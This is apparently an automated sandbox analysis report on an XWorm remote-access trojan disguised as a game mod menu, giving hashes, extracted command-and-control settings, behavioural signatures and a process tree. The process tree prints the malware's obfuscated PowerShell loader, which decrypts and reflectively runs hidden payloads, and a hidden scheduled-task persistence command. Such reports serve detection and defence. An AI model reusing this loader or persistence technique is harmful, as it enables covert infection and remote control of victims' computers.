Resubmissions
14-05-2024 11:22
240514-ngk71sdg28 1014-05-2024 11:22
240514-ngkw9add6y 1014-05-2024 11:22
240514-ngklgsdg27 1014-05-2024 11:22
240514-ngkaqadd6w 1014-05-2024 11:22
240514-ngjzysdd6v 1014-05-2024 11:22
240514-ngjn7add6t 1014-05-2024 11:22
240514-ngh3nadd6s 1014-05-2024 11:22
240514-ngh3nadg25 1014-05-2024 11:21
240514-nghrwsdd51 1014-05-2024 11:21
240514-ngg6csdd5z 10Analysis
-
max time kernel
92s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 11:22
Static task
static1
Behavioral task
behavioral1
Sample
kiddionsmodmenu.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
kiddionsmodmenu.exe
Resource
win7-20240215-en
Behavioral task
behavioral3
Sample
kiddionsmodmenu.exe
Resource
win10v2004-20240508-en
General
-
Target
kiddionsmodmenu.exe
-
Size
386KB
-
MD5
88e737816cc5f3e3809152c5f9dad5be
-
SHA1
56dedf42285c74795f714dbac7782a5d0e695a97
-
SHA256
6d09d43c755d5081924748104ac487afadaf68add75d85feb2a256de032a5e2c
-
SHA512
8d29b5606f91b953263738f03188a56a4c981a6213b53a830bd1e3975ff3d10274704df2dda957fa0b73cd8841947d6e850c6046338b8ebe9666ca895ce0eebd
-
SSDEEP
12288:hFPdfNMz0ECh63X3u+DnSmMk1B+8kxkpTD:hddFMz0EH3X39DnL3PHkxgn
Malware Config
Extracted
xworm
5.0
94.156.8.167:2020
8sPZSP21r8KwS1LM
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral3/memory/2784-77-0x0000000007120000-0x000000000712E000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 1 2784 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2436 powershell.exe 2464 powershell.exe 2784 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation kiddionsmodmenu.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2436 powershell.exe 2436 powershell.exe 2464 powershell.exe 2464 powershell.exe 2784 powershell.exe 2784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeIncreaseQuotaPrivilege 2464 powershell.exe Token: SeSecurityPrivilege 2464 powershell.exe Token: SeTakeOwnershipPrivilege 2464 powershell.exe Token: SeLoadDriverPrivilege 2464 powershell.exe Token: SeSystemProfilePrivilege 2464 powershell.exe Token: SeSystemtimePrivilege 2464 powershell.exe Token: SeProfSingleProcessPrivilege 2464 powershell.exe Token: SeIncBasePriorityPrivilege 2464 powershell.exe Token: SeCreatePagefilePrivilege 2464 powershell.exe Token: SeBackupPrivilege 2464 powershell.exe Token: SeRestorePrivilege 2464 powershell.exe Token: SeShutdownPrivilege 2464 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeSystemEnvironmentPrivilege 2464 powershell.exe Token: SeRemoteShutdownPrivilege 2464 powershell.exe Token: SeUndockPrivilege 2464 powershell.exe Token: SeManageVolumePrivilege 2464 powershell.exe Token: 33 2464 powershell.exe Token: 34 2464 powershell.exe Token: 35 2464 powershell.exe Token: 36 2464 powershell.exe Token: SeIncreaseQuotaPrivilege 2464 powershell.exe Token: SeSecurityPrivilege 2464 powershell.exe Token: SeTakeOwnershipPrivilege 2464 powershell.exe Token: SeLoadDriverPrivilege 2464 powershell.exe Token: SeSystemProfilePrivilege 2464 powershell.exe Token: SeSystemtimePrivilege 2464 powershell.exe Token: SeProfSingleProcessPrivilege 2464 powershell.exe Token: SeIncBasePriorityPrivilege 2464 powershell.exe Token: SeCreatePagefilePrivilege 2464 powershell.exe Token: SeBackupPrivilege 2464 powershell.exe Token: SeRestorePrivilege 2464 powershell.exe Token: SeShutdownPrivilege 2464 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeSystemEnvironmentPrivilege 2464 powershell.exe Token: SeRemoteShutdownPrivilege 2464 powershell.exe Token: SeUndockPrivilege 2464 powershell.exe Token: SeManageVolumePrivilege 2464 powershell.exe Token: 33 2464 powershell.exe Token: 34 2464 powershell.exe Token: 35 2464 powershell.exe Token: 36 2464 powershell.exe Token: SeIncreaseQuotaPrivilege 2464 powershell.exe Token: SeSecurityPrivilege 2464 powershell.exe Token: SeTakeOwnershipPrivilege 2464 powershell.exe Token: SeLoadDriverPrivilege 2464 powershell.exe Token: SeSystemProfilePrivilege 2464 powershell.exe Token: SeSystemtimePrivilege 2464 powershell.exe Token: SeProfSingleProcessPrivilege 2464 powershell.exe Token: SeIncBasePriorityPrivilege 2464 powershell.exe Token: SeCreatePagefilePrivilege 2464 powershell.exe Token: SeBackupPrivilege 2464 powershell.exe Token: SeRestorePrivilege 2464 powershell.exe Token: SeShutdownPrivilege 2464 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeSystemEnvironmentPrivilege 2464 powershell.exe Token: SeRemoteShutdownPrivilege 2464 powershell.exe Token: SeUndockPrivilege 2464 powershell.exe Token: SeManageVolumePrivilege 2464 powershell.exe Token: 33 2464 powershell.exe Token: 34 2464 powershell.exe Token: 35 2464 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 436 wrote to memory of 2288 436 kiddionsmodmenu.exe 81 PID 436 wrote to memory of 2288 436 kiddionsmodmenu.exe 81 PID 436 wrote to memory of 2288 436 kiddionsmodmenu.exe 81 PID 2288 wrote to memory of 1952 2288 cmd.exe 84 PID 2288 wrote to memory of 1952 2288 cmd.exe 84 PID 2288 wrote to memory of 1952 2288 cmd.exe 84 PID 2288 wrote to memory of 2436 2288 cmd.exe 85 PID 2288 wrote to memory of 2436 2288 cmd.exe 85 PID 2288 wrote to memory of 2436 2288 cmd.exe 85 PID 2436 wrote to memory of 2464 2436 powershell.exe 86 PID 2436 wrote to memory of 2464 2436 powershell.exe 86 PID 2436 wrote to memory of 2464 2436 powershell.exe 86 PID 2436 wrote to memory of 1844 2436 powershell.exe 89 PID 2436 wrote to memory of 1844 2436 powershell.exe 89 PID 2436 wrote to memory of 1844 2436 powershell.exe 89 PID 1844 wrote to memory of 4388 1844 WScript.exe 90 PID 1844 wrote to memory of 4388 1844 WScript.exe 90 PID 1844 wrote to memory of 4388 1844 WScript.exe 90 PID 4388 wrote to memory of 3484 4388 cmd.exe 92 PID 4388 wrote to memory of 3484 4388 cmd.exe 92 PID 4388 wrote to memory of 3484 4388 cmd.exe 92 PID 4388 wrote to memory of 2784 4388 cmd.exe 93 PID 4388 wrote to memory of 2784 4388 cmd.exe 93 PID 4388 wrote to memory of 2784 4388 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS4805.tmp\XClient_Dealed.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Local\Temp\7zS4805.tmp\XClient_Dealed.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:1952
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_527_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_527.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_527.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_527.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Roaming\Windows_Log_527.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:3484
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2784
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
Filesize
20KB
MD588650e71330b2c96bf96bb3824518a5f
SHA1483c42ab8ba949f4e0ce24a3b67924057e1eb604
SHA256505e52f13f29dc0925e5d9e96337bcf97e122e27edfaf9d65bbc641561b6090b
SHA5129b42dab83e3ea8a8b1703172104009a391be1732770f117f13ee8b8101ac338c625770336ee62dad101d9577c1806b300fd884f9e20c4b6b6c1541bd3a6c2369
-
Filesize
152KB
MD50b426e8571f8d3e437b7a42e9b8fd808
SHA1986edba4c39be9edb552284dac555e2e95f68a4a
SHA2569c1a4e3a1c90d013a9465ab585ad7a9cfc378ebdbe77fc1548cb81c791e6914e
SHA512e2efb8ba96b4c11b6167f085d5545e7e4971850e3c57f76957b8a0b0e1896537d935d123de93c1ebfd3efab34139e9bf902911ba54f20ddffad21edeeb16b021
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
115B
MD564933a2c063ae74a23ce73c5493747a6
SHA1250abef2479eafc1f266e1f632b8f42dd556fd39
SHA25614bd01125c837d9a0efa5a2a864eed27a1369d8c37dfda430e17f87ac0a7f6b7
SHA51258b43cc1e41ac3b399404b7375545e832e0d1645c36e8aea9c0b1b22ea0becdd52c5531368c364fb676cf597b26ff93bb50888e0271d43609539ad771b3d4009